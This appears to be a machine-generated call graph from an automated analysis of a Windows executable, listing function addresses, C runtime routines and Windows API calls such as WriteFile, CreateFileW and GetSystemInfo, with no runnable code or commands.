b80dae 105755->105760 105757 b78b28 __mbschr_l 58 API calls 105756->105757 105768 b80d6c __initptd 105757->105768 105761 b78af4 __close 58 API calls 105758->105761 105762 b80dd8 105759->105762 105763 b80dc3 105759->105763 105764 b78b28 __mbschr_l 58 API calls 105760->105764 105761->105760 105766 b7d206 ___lock_fhandle 59 API calls 105762->105766 105765 b78af4 __close 58 API calls 105763->105765 105772 b80dd0 105764->105772 105769 b80dc8 105765->105769 105767 b80dde 105766->105767 105770 b80df1 105767->105770 105771 b80e04 105767->105771 105768->105705 105773 b78b28 __mbschr_l 58 API calls 105769->105773 105774 b80e5b __read_nolock 70 API calls 105770->105774 105776 b78b28 __mbschr_l 58 API calls 105771->105776 105775 b78db6 __mbschr_l 9 API calls 105772->105775 105773->105772 105777 b80dfd 105774->105777 105775->105768 105778 b80e09 105776->105778 105780 b80e33 __read RtlLeaveCriticalSection 105777->105780 105779 b78af4 __close 58 API calls 105778->105779 105779->105777 105780->105768 105781->105697 105782->105706 105783->105700 105785 b75c6c __initptd 105784->105785 105786 b75c93 105785->105786 105787 b75c7e 105785->105787 105789 b76c11 __lock_file 59 API calls 105786->105789 105798 b78b28 58 API calls __getptd_noexit 105787->105798 105791 b75c99 105789->105791 105790 b75c83 105799 b78db6 9 API calls __mbschr_l 105790->105799 105800 b758d0 67 API calls 6 library calls 105791->105800 105794 b75ca4 105801 b75cc4 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 105794->105801 105796 b75cb6 105797 b75c8e __initptd 105796->105797 105797->105381 105798->105790 105799->105797 105800->105794 105801->105796 105802->105237 105803->105245 105804->105258 105805->105260 105806->105257 105807->105267 105809 b59169 Mailbox 105808->105809 105810 b8f19f 105809->105810 105815 b59173 105809->105815 105811 b70db6 Mailbox 59 API calls 105810->105811 105812 b8f1ab 105811->105812 105813 b5917a 105813->105272 105815->105813 105816 b59c90 59 API calls Mailbox 105815->105816 105816->105815 105817->105277 105818->105274 105819->105286 105820->105304 105822 bb8b11 105821->105822 105823 bb8b1f 105821->105823 105824 b7525b 115 API calls 105822->105824 105825 bb8b64 105823->105825 105826 b7525b 115 API calls 105823->105826 105848 bb8b28 105823->105848 105824->105823 105852 bb8d91 105825->105852 105827 bb8b49 105826->105827 105827->105825 105829 bb8b52 105827->105829 105833 b753a6 __fcloseall 83 API calls 105829->105833 105829->105848 105830 bb8ba8 105831 bb8bcd 105830->105831 105832 bb8bac 105830->105832 105856 bb89a9 105831->105856 105835 bb8bb9 105832->105835 105837 b753a6 __fcloseall 83 API calls 105832->105837 105833->105848 105838 b753a6 __fcloseall 83 API calls 105835->105838 105835->105848 105837->105835 105838->105848 105839 bb8bfb 105865 bb8c2b 105839->105865 105840 bb8bdb 105842 bb8be8 105840->105842 105844 b753a6 __fcloseall 83 API calls 105840->105844 105846 b753a6 __fcloseall 83 API calls 105842->105846 105842->105848 105844->105842 105846->105848 105848->105316 105849 bb8c16 105849->105848 105851 b753a6 __fcloseall 83 API calls 105849->105851 105851->105848 105853 bb8db6 105852->105853 105855 bb8d9f __tzset_nolock _memmove 105852->105855 105854 b755e2 __fread_nolock 74 API calls 105853->105854 105854->105855 105855->105830 105857 b7571c __crtCompareStringA_stat 58 API calls 105856->105857 105858 bb89b8 105857->105858 105859 b7571c __crtCompareStringA_stat 58 API calls 105858->105859 105860 bb89cc 105859->105860 105861 b7571c __crtCompareStringA_stat 58 API calls 105860->105861 105862 bb89e0 105861->105862 105863 bb8d0d 58 API calls 105862->105863 105864 bb89f3 105862->105864 105863->105864 105864->105839 105864->105840 105869 bb8c40 105865->105869 105866 bb8cf8 105898 bb8f35 105866->105898 105868 bb8a05 74 API calls 105868->105869 105869->105866 105869->105868 105872 bb8c02 105869->105872 105894 bb8e12 105869->105894 105902 bb8aa1 74 API calls 105869->105902 105873 bb8d0d 105872->105873 105874 bb8d1a 105873->105874 105875 bb8d20 105873->105875 105877 b72d55 _free 58 API calls 105874->105877 105876 bb8d31 105875->105876 105878 b72d55 _free 58 API calls 105875->105878 105879 bb8c09 105876->105879 105880 b72d55 _free 58 API calls 105876->105880 105877->105875 105878->105876 105879->105849 105881 b753a6 105879->105881 105880->105879 105882 b753b2 __initptd 105881->105882 105883 b753c6 105882->105883 105884 b753de 105882->105884 105951 b78b28 58 API calls __getptd_noexit 105883->105951 105887 b76c11 __lock_file 59 API calls 105884->105887 105890 b753d6 __initptd 105884->105890 105886 b753cb 105952 b78db6 9 API calls __mbschr_l 105886->105952 105889 b753f0 105887->105889 105935 b7533a 105889->105935 105890->105849 105895 bb8e61 105894->105895 105896 bb8e21 105894->105896 105895->105896 105903 bb8ee8 105895->105903 105896->105869 105899 bb8f53 105898->105899 105900 bb8f42 105898->105900 105899->105872 105901 b74863 80 API calls 105900->105901 105901->105899 105902->105869 105904 bb8f25 105903->105904 105905 bb8f14 105903->105905 105904->105895 105907 b74863 105905->105907 105908 b7486f __initptd 105907->105908 105909 b748a5 105908->105909 105910 b7488d 105908->105910 105911 b7489d __initptd 105908->105911 105912 b76c11 __lock_file 59 API calls 105909->105912 105932 b78b28 58 API calls __getptd_noexit 105910->105932 105911->105904 105914 b748ab 105912->105914 105920 b7470a 105914->105920 105915 b74892 105933 b78db6 9 API calls __mbschr_l 105915->105933 105922 b74719 105920->105922 105929 b74737 105920->105929 105921 b74727 105923 b78b28 __mbschr_l 58 API calls 105921->105923 105922->105921 105924 b74751 _memmove 105922->105924 105922->105929 105925 b7472c 105923->105925 105927 b7ae1e __flsbuf 78 API calls 105924->105927 105928 b74a3d __flush 78 API calls 105924->105928 105924->105929 105930 b746e6 __flswbuf 58 API calls 105924->105930 105931 b7d886 __write 78 API calls 105924->105931 105926 b78db6 __mbschr_l 9 API calls 105925->105926 105926->105929 105927->105924 105928->105924 105934 b748dd RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 105929->105934 105930->105924 105931->105924 105932->105915 105933->105911 105934->105911 105936 b7535d 105935->105936 105937 b75349 105935->105937 105939 b75359 105936->105939 105954 b74a3d 105936->105954 105990 b78b28 58 API calls __getptd_noexit 105937->105990 105953 b75415 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 105939->105953 105940 b7534e 105991 b78db6 9 API calls __mbschr_l 105940->105991 105946 b746e6 __flswbuf 58 API calls 105947 b75377 105946->105947 105964 b80a02 105947->105964 105949 b7537d 105949->105939 105950 b72d55 _free 58 API calls 105949->105950 105950->105939 105951->105886 105952->105890 105953->105890 105955 b74a50 105954->105955 105959 b74a74 105954->105959 105956 b746e6 __flswbuf 58 API calls 105955->105956 105955->105959 105957 b74a6d 105956->105957 105992 b7d886 105957->105992 105960 b80b77 105959->105960 105961 b75371 105960->105961 105962 b80b84 105960->105962 105961->105946 105962->105961 105963 b72d55 _free 58 API calls 105962->105963 105963->105961 105965 b80a0e __initptd 105964->105965 105966 b80a1b 105965->105966 105967 b80a32 105965->105967 106117 b78af4 58 API calls __getptd_noexit 105966->106117 105969 b80abd 105967->105969 105971 b80a42 105967->105971 106122 b78af4 58 API calls __getptd_noexit 105969->106122 105970 b80a20 106118 b78b28 58 API calls __getptd_noexit 105970->106118 105974 b80a6a 105971->105974 105975 b80a60 105971->105975 105977 b7d206 ___lock_fhandle 59 API calls 105974->105977 106119 b78af4 58 API calls __getptd_noexit 105975->106119 105976 b80a65 106123 b78b28 58 API calls __getptd_noexit 105976->106123 105980 b80a70 105977->105980 105982 b80a8e 105980->105982 105983 b80a83 105980->105983 105981 b80ac9 106124 b78db6 9 API calls __mbschr_l 105981->106124 106120 b78b28 58 API calls __getptd_noexit 105982->106120 106102 b80add 105983->106102 105986 b80a27 __initptd 105986->105949 105988 b80a89 106121 b80ab5 RtlLeaveCriticalSection __unlock_fhandle 105988->106121 105990->105940 105991->105939 105993 b7d892 __initptd 105992->105993 105994 b7d8b6 105993->105994 105995 b7d89f 105993->105995 105997 b7d955 105994->105997 106000 b7d8ca 105994->106000 106093 b78af4 58 API calls __getptd_noexit 105995->106093 106099 b78af4 58 API calls __getptd_noexit 105997->106099 105999 b7d8a4 106094 b78b28 58 API calls __getptd_noexit 105999->106094 106003 b7d8f2 106000->106003 106004 b7d8e8 106000->106004 106001 b7d8ed 106100 b78b28 58 API calls __getptd_noexit 106001->106100 106020 b7d206 106003->106020 106095 b78af4 58 API calls __getptd_noexit 106004->106095 106008 b7d8f8 106010 b7d91e 106008->106010 106011 b7d90b 106008->106011 106009 b7d961 106101 b78db6 9 API calls __mbschr_l 106009->106101 106096 b78b28 58 API calls __getptd_noexit 106010->106096 106029 b7d975 106011->106029 106015 b7d8ab __initptd 106015->105959 106016 b7d917 106098 b7d94d RtlLeaveCriticalSection __unlock_fhandle 106016->106098 106017 b7d923 106097 b78af4 58 API calls __getptd_noexit 106017->106097 106021 b7d212 __initptd 106020->106021 106022 b7d261 RtlEnterCriticalSection 106021->106022 106023 b79c0b __lock 58 API calls 106021->106023 106024 b7d287 __initptd 106022->106024 106025 b7d237 106023->106025 106024->106008 106026 b79e2b __mtinitlocknum InitializeCriticalSectionAndSpinCount 106025->106026 106028 b7d24f 106025->106028 106026->106028 106027 b7d28b ___lock_fhandle RtlLeaveCriticalSection 106027->106022 106028->106027 106030 b7d982 __write_nolock 106029->106030 106031 b7d9c1 106030->106031 106032 b7d9e0 106030->106032 106060 b7d9b6 106030->106060 106034 b78af4 __close 58 API calls 106031->106034 106035 b7da38 106032->106035 106036 b7da1c 106032->106036 106033 b7c5f6 __ld12tod 6 API calls 106037 b7e1d6 106033->106037 106038 b7d9c6 106034->106038 106040 b7da51 106035->106040 106042 b818c1 __lseeki64_nolock 60 API calls 106035->106042 106039 b78af4 __close 58 API calls 106036->106039 106037->106016 106041 b78b28 __mbschr_l 58 API calls 106038->106041 106045 b7da21 106039->106045 106044 b85c6b __flswbuf 58 API calls 106040->106044 106043 b7d9cd 106041->106043 106042->106040 106046 b78db6 __mbschr_l 9 API calls 106043->106046 106047 b7da5f 106044->106047 106048 b78b28 __mbschr_l 58 API calls 106045->106048 106046->106060 106049 b7ddb8 106047->106049 106054 b799ac __beginthread 58 API calls 106047->106054 106050 b7da28 106048->106050 106051 b7ddd6 106049->106051 106052 b7e14b WriteFile 106049->106052 106053 b78db6 __mbschr_l 9 API calls 106050->106053 106055 b7defa 106051->106055 106064 b7ddec 106051->106064 106056 b7ddab GetLastError 106052->106056 106062 b7dd78 106052->106062 106053->106060 106057 b7da8b GetConsoleMode 106054->106057 106067 b7df05 106055->106067 106070 b7dfef 106055->106070 106056->106062 106057->106049 106059 b7daca 106057->106059 106058 b7e184 106058->106060 106061 b78b28 __mbschr_l 58 API calls 106058->106061 106059->106049 106063 b7dada GetConsoleCP 106059->106063 106060->106033 106068 b7e1b2 106061->106068 106062->106058 106062->106060 106069 b7ded8 106062->106069 106063->106058 106087 b7db09 106063->106087 106064->106058 106065 b7de5b WriteFile 106064->106065 106065->106056 106066 b7de98 106065->106066 106066->106064 106071 b7debc 106066->106071 106067->106058 106072 b7df6a WriteFile 106067->106072 106073 b78af4 __close 58 API calls 106068->106073 106074 b7dee3 106069->106074 106075 b7e17b 106069->106075 106070->106058 106076 b7e064 WideCharToMultiByte 106070->106076 106071->106062 106072->106056 106077 b7dfb9 106072->106077 106073->106060 106078 b78b28 __mbschr_l 58 API calls 106074->106078 106079 b78b07 __dosmaperr 58 API calls 106075->106079 106076->106056 106085 b7e0ab 106076->106085 106077->106062 106077->106067 106077->106071 106081 b7dee8 106078->106081 106079->106060 106080 b7e0b3 WriteFile 106083 b7e106 GetLastError 106080->106083 106080->106085 106084 b78af4 __close 58 API calls 106081->106084 106082 b735f5 __write_nolock 58 API calls 106082->106087 106083->106085 106084->106060 106085->106062 106085->106070 106085->106071 106085->106080 106086 b7dc5f 106086->106056 106086->106062 106086->106087 106091 b87a5e WriteConsoleW CreateFileW __putwch_nolock 106086->106091 106092 b7dc87 WriteFile 106086->106092 106087->106062 106087->106082 106087->106086 106088 b862ba 60 API calls __write_nolock 106087->106088 106089 b7dbf2 WideCharToMultiByte 106087->106089 106088->106087 106089->106062 106090 b7dc2d WriteFile 106089->106090 106090->106056 106090->106086 106091->106086 106092->106056 106092->106086 106093->105999 106094->106015 106095->106001 106096->106017 106097->106016 106098->106015 106099->106001 106100->106009 106101->106015 106125 b7d4c3 106102->106125 106104 b80b41 106138 b7d43d 59 API calls 2 library calls 106104->106138 106106 b80aeb 106106->106104 106108 b7d4c3 __lseek_nolock 58 API calls 106106->106108 106116 b80b1f 106106->106116 106107 b80b49 106113 b80b6b 106107->106113 106139 b78b07 58 API calls 3 library calls 106107->106139 106110 b80b16 106108->106110 106109 b7d4c3 __lseek_nolock 58 API calls 106111 b80b2b CloseHandle 106109->106111 106114 b7d4c3 __lseek_nolock 58 API calls 106110->106114 106111->106104 106115 b80b37 GetLastError 106111->106115 106113->105988 106114->106116 106115->106104 106116->106104 106116->106109 106117->105970 106118->105986 106119->105976 106120->105988 106121->105986 106122->105976 106123->105981 106124->105986 106126 b7d4ce 106125->106126 106129 b7d4e3 106125->106129 106127 b78af4 __close 58 API calls 106126->106127 106128 b7d4d3 106127->106128 106131 b78b28 __mbschr_l 58 API calls 106128->106131 106130 b78af4 __close 58 API calls 106129->106130 106132 b7d508 106129->106132 106133 b7d512 106130->106133 106134 b7d4db 106131->106134 106132->106106 106135 b78b28 __mbschr_l 58 API calls 106133->106135 106134->106106 106136 b7d51a 106135->106136 106137 b78db6 __mbschr_l 9 API calls 106136->106137 106137->106134 106138->106107 106139->106113 106202 b81940 106140->106202 106143 b5477c 106146 b57bcc 59 API calls 106143->106146 106144 b54799 106208 b57d8c 106144->106208 106147 b54788 106146->106147 106204 b57726 106147->106204 106150 b70791 106151 b81940 __write_nolock 106150->106151 106152 b7079e GetLongPathNameW 106151->106152 106153 b57bcc 59 API calls 106152->106153 106154 b572bd 106153->106154 106155 b5700b 106154->106155 106156 b57667 59 API calls 106155->106156 106157 b5701d 106156->106157 106158 b54750 60 API calls 106157->106158 106159 b57028 106158->106159 106160 b57033 106159->106160 106161 b8e885 106159->106161 106163 b53f74 59 API calls 106160->106163 106166 b8e89f 106161->106166 106222 b57908 61 API calls 106161->106222 106164 b5703f 106163->106164 106216 b534c2 106164->106216 106167 b57052 Mailbox 106167->105043 106169 b54ddd 136 API calls 106168->106169 106170 b5688f 106169->106170 106171 b8e031 106170->106171 106172 b54ddd 136 API calls 106170->106172 106173 bb955b 122 API calls 106171->106173 106174 b568a3 106172->106174 106175 b8e046 106173->106175 106174->106171 106176 b568ab 106174->106176 106177 b8e04a 106175->106177 106178 b8e067 106175->106178 106180 b568b7 106176->106180 106181 b8e052 106176->106181 106182 b54e4a 84 API calls 106177->106182 106179 b70db6 Mailbox 59 API calls 106178->106179 106191 b8e0ac Mailbox 106179->106191 106223 b56a8c 106180->106223 106339 bb42f8 90 API calls _wprintf 106181->106339 106182->106181 106185 b8e060 106185->106178 106187 b8e260 106188 b72d55 _free 58 API calls 106187->106188 106189 b8e268 106188->106189 106190 b54e4a 84 API calls 106189->106190 106196 b8e271 106190->106196 106191->106187 106191->106196 106199 b57de1 59 API calls 106191->106199 106316 baf73d 106191->106316 106319 bb737f 106191->106319 106325 b5750f 106191->106325 106333 b5735d 106191->106333 106340 baf65e 61 API calls 2 library calls 106191->106340 106195 b72d55 _free 58 API calls 106195->106196 106196->106195 106198 b54e4a 84 API calls 106196->106198 106341 baf7a1 89 API calls 4 library calls 106196->106341 106198->106196 106199->106191 106203 b5475d GetFullPathNameW 106202->106203 106203->106143 106203->106144 106205 b57734 106204->106205 106212 b57d2c 106205->106212 106207 b54794 106207->106150 106209 b57da6 106208->106209 106210 b57d99 106208->106210 106211 b70db6 Mailbox 59 API calls 106209->106211 106210->106147 106211->106210 106213 b57d3a 106212->106213 106215 b57d43 _memmove 106212->106215 106214 b57e4f 59 API calls 106213->106214 106213->106215 106214->106215 106215->106207 106217 b534d4 106216->106217 106221 b534f3 _memmove 106216->106221 106219 b70db6 Mailbox 59 API calls 106217->106219 106218 b70db6 Mailbox 59 API calls 106220 b5350a 106218->106220 106219->106221 106220->106167 106221->106218 106222->106161 106224 b56ab5 106223->106224 106225 b8e41e 106223->106225 106347 b557a6 60 API calls Mailbox 106224->106347 106433 baf7a1 89 API calls 4 library calls 106225->106433 106228 b8e431 106434 baf7a1 89 API calls 4 library calls 106228->106434 106229 b56ad7 106348 b557f6 106229->106348 106233 b56af4 106235 b57667 59 API calls 106233->106235 106234 b8e44d 106238 b56b61 106234->106238 106236 b56b00 106235->106236 106361 b70957 60 API calls __write_nolock 106236->106361 106240 b8e460 106238->106240 106241 b56b6f 106238->106241 106239 b56b0c 106242 b57667 59 API calls 106239->106242 106243 b55c6f CloseHandle 106240->106243 106244 b57667 59 API calls 106241->106244 106245 b56b18 106242->106245 106246 b8e46c 106243->106246 106247 b56b78 106244->106247 106248 b54750 60 API calls 106245->106248 106249 b54ddd 136 API calls 106246->106249 106250 b57667 59 API calls 106247->106250 106251 b56b26 106248->106251 106252 b8e488 106249->106252 106253 b56b81 106250->106253 106362 b55850 ReadFile SetFilePointerEx 106251->106362 106256 b8e4b1 106252->106256 106260 bb955b 122 API calls 106252->106260 106371 b5459b 106253->106371 106435 baf7a1 89 API calls 4 library calls 106256->106435 106257 b56b98 106261 b57b2e 59 API calls 106257->106261 106259 b56b52 106363 b55aee 106259->106363 106264 b8e4a4 106260->106264 106267 b56ba9 SetCurrentDirectoryW 106261->106267 106262 b8e4c8 106294 b56d0c Mailbox 106262->106294 106265 b8e4ac 106264->106265 106266 b8e4cd 106264->106266 106268 b54e4a 84 API calls 106265->106268 106269 b54e4a 84 API calls 106266->106269 106272 b56bbc Mailbox 106267->106272 106268->106256 106270 b8e4d2 106269->106270 106271 b70db6 Mailbox 59 API calls 106270->106271 106278 b8e506 106271->106278 106274 b70db6 Mailbox 59 API calls 106272->106274 106276 b56bcf 106274->106276 106275 b53bbb 106275->104910 106275->104933 106277 b5522e 59 API calls 106276->106277 106305 b56bda Mailbox __NMSG_WRITE 106277->106305 106279 b5750f 59 API calls 106278->106279 106311 b8e54f Mailbox 106279->106311 106280 b56ce7 106429 b55c6f 106280->106429 106281 b8e740 106438 bb72df 59 API calls Mailbox 106281->106438 106284 b56cf3 SetCurrentDirectoryW 106284->106294 106287 b8e762 106439 bcfbce 59 API calls 2 library calls 106287->106439 106290 b8e76f 106292 b72d55 _free 58 API calls 106290->106292 106291 b8e7d9 106442 baf7a1 89 API calls 4 library calls 106291->106442 106292->106294 106342 b557d4 106294->106342 106296 b5750f 59 API calls 106296->106311 106297 b8e7f2 106297->106280 106299 b8e7d1 106441 baf5f7 59 API calls 4 library calls 106299->106441 106302 b57de1 59 API calls 106302->106305 106304 baf73d 59 API calls 106304->106311 106305->106280 106305->106291 106305->106299 106305->106302 106422 b5586d 67 API calls _wcscpy 106305->106422 106423 b56f5d GetStringTypeW 106305->106423 106424 b56ecc 60 API calls __wcsnicmp 106305->106424 106425 b56faa GetStringTypeW __NMSG_WRITE 106305->106425 106426 b7363d GetStringTypeW _iswctype 106305->106426 106427 b568dc 165 API calls 3 library calls 106305->106427 106428 b57213 59 API calls Mailbox 106305->106428 106306 b57de1 59 API calls 106306->106311 106307 bb737f 59 API calls 106307->106311 106310 b8e792 106440 baf7a1 89 API calls 4 library calls 106310->106440 106311->106281 106311->106296 106311->106304 106311->106306 106311->106307 106311->106310 106436 baf65e 61 API calls 2 library calls 106311->106436 106437 b57213 59 API calls Mailbox 106311->106437 106313 b8e7ab 106314 b72d55 _free 58 API calls 106313->106314 106315 b8e7be 106314->106315 106315->106294 106317 b70db6 Mailbox 59 API calls 106316->106317 106318 baf76d _memmove 106317->106318 106318->106191 106320 bb738a 106319->106320 106321 b70db6 Mailbox 59 API calls 106320->106321 106322 bb73a1 106321->106322 106323 b57de1 59 API calls 106322->106323 106324 bb73b0 106322->106324 106323->106324 106324->106191 106326 b575af 106325->106326 106329 b57522 _memmove 106325->106329 106328 b70db6 Mailbox 59 API calls 106326->106328 106327 b70db6 Mailbox 59 API calls 106330 b57529 106327->106330 106328->106329 106329->106327 106331 b70db6 Mailbox 59 API calls 106330->106331 106332 b57552 106330->106332 106331->106332 106332->106191 106334 b57370 106333->106334 106337 b5741e 106333->106337 106336 b70db6 Mailbox 59 API calls 106334->106336 106338 b573a2 106334->106338 106335 b70db6 59 API calls Mailbox 106335->106338 106336->106338 106337->106191 106338->106335 106338->106337 106339->106185 106340->106191 106341->106196 106343 b55c6f CloseHandle 106342->106343 106344 b557dc Mailbox 106343->106344 106345 b55c6f CloseHandle 106344->106345 106346 b557eb 106345->106346 106346->106275 106347->106229 106349 b55c6f CloseHandle 106348->106349 106350 b55802 106349->106350 106443 b55c99 106350->106443 106352 b55821 106356 b55844 106352->106356 106451 b55610 106352->106451 106354 b55833 106468 b5527b SetFilePointerEx SetFilePointerEx 106354->106468 106356->106228 106356->106233 106357 b5583a 106357->106356 106358 b8dc07 106357->106358 106469 bb345a SetFilePointerEx SetFilePointerEx WriteFile 106358->106469 106360 b8dc37 106360->106356 106361->106239 106362->106259 106368 b55b08 106363->106368 106364 b8dd28 106483 b55c4e SetFilePointerEx 106364->106483 106365 b55b8f SetFilePointerEx 106482 b55c4e SetFilePointerEx 106365->106482 106368->106364 106368->106365 106370 b55b63 106368->106370 106369 b8dd42 106370->106238 106372 b57667 59 API calls 106371->106372 106373 b545b1 106372->106373 106374 b57667 59 API calls 106373->106374 106375 b545b9 106374->106375 106376 b57667 59 API calls 106375->106376 106377 b545c1 106376->106377 106378 b57667 59 API calls 106377->106378 106379 b545c9 106378->106379 106380 b545fd 106379->106380 106381 b8d4d2 106379->106381 106382 b5784b 59 API calls 106380->106382 106383 b58047 59 API calls 106381->106383 106384 b5460b 106382->106384 106385 b8d4db 106383->106385 106386 b57d2c 59 API calls 106384->106386 106387 b57d8c 59 API calls 106385->106387 106388 b54615 106386->106388 106390 b54640 106387->106390 106389 b5784b 59 API calls 106388->106389 106388->106390 106392 b54636 106389->106392 106393 b5465f 106390->106393 106406 b8d4fb 106390->106406 106407 b54680 106390->106407 106396 b57d2c 59 API calls 106392->106396 106394 b579f2 59 API calls 106393->106394 106398 b54669 106394->106398 106395 b54691 106399 b546a3 106395->106399 106401 b58047 59 API calls 106395->106401 106396->106390 106397 b8d5cb 106400 b57bcc 59 API calls 106397->106400 106404 b5784b 59 API calls 106398->106404 106398->106407 106402 b546b3 106399->106402 106405 b58047 59 API calls 106399->106405 106417 b8d588 106400->106417 106401->106399 106403 b546ba 106402->106403 106409 b58047 59 API calls 106402->106409 106410 b58047 59 API calls 106403->106410 106419 b546c1 Mailbox 106403->106419 106404->106407 106405->106402 106406->106397 106408 b8d5b4 106406->106408 106416 b8d532 106406->106416 106484 b5784b 106407->106484 106408->106397 106413 b8d59f 106408->106413 106409->106403 106410->106419 106411 b579f2 59 API calls 106411->106417 106412 b8d590 106414 b57bcc 59 API calls 106412->106414 106415 b57bcc 59 API calls 106413->106415 106414->106417 106415->106417 106416->106412 106420 b8d57b 106416->106420 106417->106407 106417->106411 106497 b57924 59 API calls 2 library calls 106417->106497 106419->106257 106421 b57bcc 59 API calls 106420->106421 106421->106417 106422->106305 106423->106305 106424->106305 106425->106305 106426->106305 106427->106305 106428->106305 106430 b55c79 106429->106430 106431 b55c88 106429->106431 106430->106284 106431->106430 106432 b55c8d CloseHandle 106431->106432 106432->106430 106433->106228 106434->106234 106435->106262 106436->106311 106437->106311 106438->106287 106439->106290 106440->106313 106441->106291 106442->106297 106444 b8dd58 106443->106444 106445 b55cb2 CreateFileW 106443->106445 106446 b55cd4 106444->106446 106447 b8dd5e CreateFileW 106444->106447 106445->106446 106446->106352 106447->106446 106448 b8dd84 106447->106448 106449 b55aee 2 API calls 106448->106449 106450 b8dd8f 106449->106450 106450->106446 106452 b8dba5 106451->106452 106453 b5562b 106451->106453 106467 b556ba 106452->106467 106476 b55cdf 106452->106476 106454 b55aee 2 API calls 106453->106454 106453->106467 106455 b5564d 106454->106455 106457 b5522e 59 API calls 106455->106457 106458 b55657 106457->106458 106458->106452 106459 b55664 106458->106459 106460 b70db6 Mailbox 59 API calls 106459->106460 106461 b5566f 106460->106461 106462 b5522e 59 API calls 106461->106462 106463 b5567a 106462->106463 106470 b55bc0 106463->106470 106465 b556a7 106466 b55aee 2 API calls 106465->106466 106466->106467 106467->106354 106468->106357 106469->106360 106471 b55c33 106470->106471 106475 b55bce 106470->106475 106481 b55c4e SetFilePointerEx 106471->106481 106472 b55bf6 106472->106465 106474 b55c06 ReadFile 106474->106472 106474->106475 106475->106472 106475->106474 106477 b55aee 2 API calls 106476->106477 106478 b55d00 106477->106478 106479 b55aee 2 API calls 106478->106479 106480 b55d14 106479->106480 106480->106467 106481->106475 106482->106370 106483->106369 106485 b578b7 106484->106485 106486 b5785a 106484->106486 106487 b57d2c 59 API calls 106485->106487 106486->106485 106488 b57865 106486->106488 106494 b57888 _memmove 106487->106494 106489 b8eb09 106488->106489 106490 b57880 106488->106490 106499 b58029 106489->106499 106498 b57f27 59 API calls Mailbox 106490->106498 106493 b8eb13 106495 b70db6 Mailbox 59 API calls 106493->106495 106494->106395 106496 b8eb33 106495->106496 106497->106417 106498->106494 106500 b70db6 Mailbox 59 API calls 106499->106500 106501 b58033 106500->106501 106501->106493 106502->105054 106504 b56d95 106503->106504 106509 b56ea9 106503->106509 106505 b70db6 Mailbox 59 API calls 106504->106505 106504->106509 106507 b56dbc 106505->106507 106506 b70db6 Mailbox 59 API calls 106513 b56e31 106506->106513 106507->106506 106509->105058 106511 b5735d 59 API calls 106511->106513 106512 b5750f 59 API calls 106512->106513 106513->106509 106513->106511 106513->106512 106516 b56240 106513->106516 106541 ba6553 59 API calls Mailbox 106513->106541 106514->105061 106515->105063 106542 b57a16 106516->106542 106518 b5646a 106519 b5750f 59 API calls 106518->106519 106520 b56484 Mailbox 106519->106520 106520->106513 106523 b8dff6 106551 baf8aa 91 API calls 4 library calls 106523->106551 106524 b5750f 59 API calls 106535 b56265 106524->106535 106528 b8e004 106530 b5750f 59 API calls 106528->106530 106529 b57d8c 59 API calls 106529->106535 106531 b8e01a 106530->106531 106531->106520 106532 b56799 _memmove 106552 baf8aa 91 API calls 4 library calls 106532->106552 106533 b8df92 106534 b58029 59 API calls 106533->106534 106536 b8df9d 106534->106536 106535->106518 106535->106523 106535->106524 106535->106529 106535->106532 106535->106533 106538 b57e4f 59 API calls 106535->106538 106547 b55f6c 60 API calls 106535->106547 106548 b55d41 59 API calls Mailbox 106535->106548 106549 b55e72 60 API calls 106535->106549 106550 b57924 59 API calls 2 library calls 106535->106550 106540 b70db6 Mailbox 59 API calls 106536->106540 106539 b5643b CharUpperBuffW 106538->106539 106539->106535 106540->106532 106541->106513 106543 b70db6 Mailbox 59 API calls 106542->106543 106544 b57a3b 106543->106544 106545 b58029 59 API calls 106544->106545 106546 b57a4a 106545->106546 106546->106535 106547->106535 106548->106535 106549->106535 106550->106535 106551->106528 106552->106520 106554 b530d2 LoadIconW 106553->106554 106556 b53107 106554->106556 106556->105078 106557->105077 106559 b54196 106558->106559 106560 b8d423 106558->106560 106559->105083 106584 bb2f94 62 API calls _W_store_winword 106559->106584 106560->106559 106561 b8d42c DestroyCursor 106560->106561 106561->106559 106584->105083 106618->105103 106619->105103 106620->105103 107084 b51016 107089 b54974 107084->107089 107087 b72d40 __cinit 67 API calls 107088 b51025 107087->107088 107090 b70db6 Mailbox 59 API calls 107089->107090 107091 b5497c 107090->107091 107092 b5101b 107091->107092 107096 b54936 107091->107096 107092->107087 107097 b54951 107096->107097 107098 b5493f 107096->107098 107100 b549a0 107097->107100 107099 b72d40 __cinit 67 API calls 107098->107099 107099->107097 107101 b57667 59 API calls 107100->107101 107102 b549b8 GetVersionExW 107101->107102 107103 b57bcc 59 API calls 107102->107103 107104 b549fb 107103->107104 107105 b57d2c 59 API calls 107104->107105 107113 b54a28 107104->107113 107106 b54a1c 107105->107106 107107 b57726 59 API calls 107106->107107 107107->107113 107108 b54a93 GetCurrentProcess IsWow64Process 107110 b54aac 107108->107110 107109 b8d864 107111 b54ac2 107110->107111 107112 b54b2b GetSystemInfo 107110->107112 107124 b54b37 107111->107124 107115 b54af8 107112->107115 107113->107108 107113->107109 107115->107092 107117 b54ad4 107119 b54b37 2 API calls 107117->107119 107118 b54b1f GetSystemInfo 107120 b54ae9 107118->107120 107121 b54adc GetNativeSystemInfo 107119->107121 107120->107115 107122 b54aef FreeLibrary 107120->107122 107121->107120 107122->107115 107125 b54ad0 107124->107125 107126 b54b40 LoadLibraryA 107124->107126 107125->107117 107125->107118 107126->107125 107127 b54b51 GetProcAddress 107126->107127 107127->107125 107128 b51066 107133 b5f76f 107128->107133 107130 b5106c 107131 b72d40 __cinit 67 API calls 107130->107131 107132 b51076 107131->107132 107134 b5f790 107133->107134 107166 b6ff03 107134->107166 107138 b5f7d7 107139 b57667 59 API calls 107138->107139 107140 b5f7e1 107139->107140 107141 b57667 59 API calls 107140->107141 107142 b5f7eb 107141->107142 107143 b57667 59 API calls 107142->107143 107144 b5f7f5 107143->107144 107145 b57667 59 API calls 107144->107145 107146 b5f833 107145->107146 107147 b57667 59 API calls 107146->107147 107148 b5f8fe 107147->107148 107176 b65f87 107148->107176 107152 b5f930 107153 b57667 59 API calls 107152->107153 107154 b5f93a 107153->107154 107204 b6fd9e 107154->107204 107156 b5f981 107157 b5f991 GetStdHandle 107156->107157 107158 b945ab 107157->107158 107159 b5f9dd 107157->107159 107158->107159 107161 b945b4 107158->107161 107160 b5f9e5 OleInitialize 107159->107160 107160->107130 107211 bb6b38 64 API calls Mailbox 107161->107211 107163 b945bb 107212 bb7207 CreateThread 107163->107212 107165 b945c7 